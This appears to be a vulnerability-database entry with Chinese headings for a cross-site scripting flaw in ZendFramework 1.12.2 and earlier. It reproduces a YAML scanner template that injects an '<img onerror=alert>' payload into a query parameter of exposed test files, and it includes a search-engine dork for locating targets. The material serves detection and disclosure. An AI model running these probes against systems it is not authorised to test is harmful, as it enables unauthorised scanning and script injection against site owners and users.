zend-v1-xss: ZendFramework 1.12.2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: ZendFramework | POC: 已公开

漏洞描述

ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.

PoC代码[已公开]

id: zend-v1-xss

info:
  name: ZendFramework 1.12.2 - Cross-Site Scripting
  author: c3l3si4n
  severity: medium
  description: |
    ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
  reference:
    - https://twitter.com/c3l3si4n/status/1600035722148212737
  classification:
    cpe: cpe:2.3:a:zend:zend_framework:1.12.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zend
    product: zend_framework
    google-query: inurl:"/tests/Zend/Http/"
  tags: zend,zendframework,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"
      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"redirection"]'
          - '"param"'
          - '<img/src=x onerror=alert(document.domain)'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220254b43810c5688e423a52e9c2e66b18b5e4a0d2b169fc3113e74fce17f58c732022003e79206f806b60a67f1ff7a08488a02b58f6b3e6baaf3434f194b945540c38a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐